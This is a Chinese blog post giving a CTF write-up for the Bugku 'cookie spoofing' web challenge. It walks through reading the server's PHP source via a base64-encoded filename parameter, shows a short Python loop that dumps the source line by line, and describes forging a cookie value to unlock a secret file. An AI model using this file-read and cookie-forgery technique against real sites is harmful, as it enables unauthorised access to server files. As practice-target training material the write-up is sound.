Bugku WEB题 WriteUp

最新推荐文章于 2021-02-25 14:59:35 发布
最新推荐文章于 2021-02-25 14:59:35 发布
阅读量337 收藏 2
点赞数
分类专栏: writeup 文章标签: CTF writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzr2zr/article/details/84670352
版权

Bugku WEB题 WriteUp

1.cookies欺骗

http://123.206.87.240:8002/web11/
答案格式:KEY{xxxxxxxx}

打开链接什么都没发现,观察url发现末尾是base64加密的字符串,解码后是keys.txt
在这里插入图片描述
接着尝试用filename访问index.php(这里index.php也要使用base64进行编码),同时给line(行数)一个参数,随便给一个,这里line=3

http://123.206.87.240:8002/web11/index.php?line=3&filename=aW5kZXgucGhw=

可以看到返回了第三行的php代码
在这里插入图片描述
接下来可以改变line的值,一行一行将完整的php代码读出来,也可以搞个简单的python脚本读取代码

import requests
a = 30
for i in range(a):
	url = 'http://123.206.87.240:8002/web11/index.php?line=' + str(i) + '&filename=aW5kZXgucGhw='
	r = requests.get(url)
	print(r.text)

得到完整的php代码:

<?php

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?

$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}

if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

?>

可以看到flag存在keys.php中,将filename的参数改成编码后的keys.php,同时用hackbar传入cookie
在这里插入图片描述
查看网页源代码看到flag
在这里插入图片描述

zzr2zr
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku杂项writeup
11-22
bugku杂项writeup
Bugku-webWriteup(持续更新)
qq_45628145的博客
02-18 635
Bugku-webWriteup 这里会持续更新bugku练习平台上面webwriteup,我也是个新手,如果有什么不对的地方,欢迎大家指出,如果大家觉得写的不错的话,别忘了点个赞哦! 1.Web2 打开之后,一堆滑稽脸在动,按照惯例,f12,发现flag就在源码中。 于是得到flag。 计算器 打开之后,发现是一个加法。 准备输入答案121的时候,发现只可以按1个数字,于是f12,发现...
bugku{web writeup笔记}
baidu_39504221的博客
10-19 216
web2 F12看一下 计算器 发现这里只能写一位 按F12把下图的maxlength改一下再输入 web基础$_GET 依照意提交一个get请求 web基础$_POST 这里则是提交一个post 可以用火狐的插件hackbar,也可以用在线工具 没有hackbar我就用在线工具了 矛盾 依照意需要提交一个get参数num,需要num不是数字才能进入第一个if语句,有需要num==...
Bugkuwriteup
AcquainTance2019的博客
03-09 187
Bugkuwriteup web
BUGKU writeup
CHOOOU的博客
08-06 1万+
Reverse easy_vb soeasy easy_re f5查看v4和v5的值,再将十六进制转换成字符就行了 游戏过关 解有好几种方式 1. 搜done,看到一个函数sub_45E940,F5,分析函数的内容,当然我不是这样做的,感觉麻烦 2. 修改程序逻辑,使得输入任意数直接弹flag,搜索loc_45F5B7,这个函数是判断是否满足灯全亮什么的,往下滑,下一...
bugkuctf-WEB
05-04
bugku writeup,webwriteup,根据网上的writeup自行解后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
web渗透writeup
09-11
根据源码可以看到两处特别需要重视的地方,我已标红,很明显该sql语句存在注入漏洞,但是密码栏不能通过一般的注入来绕过,但是可以发现,只要满足了($row[pw]) && (!strcasecmp($pass, $row[pw])就可以拿到flag,...
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
2019.4 DDCTF web--滴 writeup
04-14
DDCTF,2019年4月比赛,web,第一--滴 writeup,及flag。
Bugku writeup
weixin_44119209的博客
03-03 441
Bugkuwriteup(一) 一些小的体会 在做ctf目时要选择合适的浏览器,火狐或者是谷歌,一些常用插件搞搞清楚,前期做靠工具,后期做靠实力,注意自身知识的积累与总结 一.杂项 1.签到 关注得到flag 2.这是一张单纯的图片 用winhex打开图片,发现一串数字,ascll码转码,得到flag 3.猜 百度有一个智能识图功能,识别一下,刘亦菲的大名就出来了 二.WEB 1....
Bugku web Writeup
weixin_44522540的博客
02-25 377
靶场链接:https://ctf.bugku.com/index.html 文章目录前言一、web2 随机数字运算验证码二、web3 $_GET三、web4 $_post四、web5 矛盾    0x01知识点    0x02实践五、web6 flag就在这里六、web7 你必须让他停下七、web11 webshell八、web12 本地管理员九、web8 文件包含    0x01知识点
BUGKU web--writeup
热门推荐
Sanky0u的博客
08-15 1万+
因为已经看到过很多关于bugku平台上面webwriteup,我想自己就不需要每道都写了,只写自己比较有收获的几writeup,并且将自己收集到的好几种解法都放上来。1. 文件上传测试这道提示上传php文件,但选择php文件上传的时候又提示非图片文件。解法1:将一个php文件的后缀名改成.php.jpg或者.php.png,然后选择这个文件,点击上传的时候用burpsuite抓包,改文件
bugku web writeup(持续更新)
youshangfashi的博客
10-04 321
web2 打开以后就长这样,眼睛差点瞎掉         不用想先F12一下先       看到阴影部分了没,对就是它。 ============================================================================================== 计算器 打开以后就长这样 先F12一下  ...
BugKu-Web 部分 Writeup
FFY's Blog
07-08 525
web2 查看源码,得 flag:KEY{Web-2-bugKssNNikls9100} 计算器 要求提交算式得结果,用 JS 验证 查看源码,发现可能是 code.js 然后进入查看,发现 flag:flag{CTF-bugku-0032} 矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) ...
bugku web 25-32 write up
h0ryit的博客
05-20 1010
XSS 打开页面,如图: 注意:这里以id为参数,一般这种没提示参数的话就是ID,初次这种的人可能回懵。 查看源码: &amp;amp;amp;amp;amp;amp;lt;!doctype html&amp;amp;amp;amp;amp;amp;gt; &amp;amp;amp;amp;amp;amp;lt;html lang=&amp;amp;amp;amp;amp;quot;en&amp;amp;amp;amp;amp;quot;
bugku writeup 前女友/login1
Ares-T的博客
04-02 2024
知识点:md5函数数据类型错误返回false(两个md5都返回false时相等),strcmp函数比较i出错返回0(与相等返回一样),sql约束攻击:sql会自动填充空格达到相同长度后再进行比较,sql会截取前n个字符直接进行比较前女友:http://118.89.219.210:49162/flag格式:SKCTF{xxxxxxxxxxxxxxxxxx}打开网址后发现是一大段文字查看源码发现第2...
bugku】做个游戏 writeup
perye
02-26 3279
拿到目,下载jar。直接解压拿到三个文件用反编译工具查看源代码在PlaneGameFrame这个类中成功找到flag
bugku 1~11 write up(web
giun的博客
03-06 665
一、第一web2) 查看源代码,查找flag,即可得出flag。 二、第二(计算器) 输入163,发现只能输入一位数。位数被限制了。我们使用火狐浏览器的开发者工具(F12)调出来。定位到输入框的位置。发现 最大位数被限制了,把1改成3即可得出flag。 三、第三(web基础$_GET) 打开目发现是PHP代码,阅读代码可知,我们在URL中传入参数?what=flag即可得出flag ...
[CTF]Bugku Web Writeup (1)
第八个男人
12-19 173
1. web1 直接F12。
iscc2015官方writeup
最新发布
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值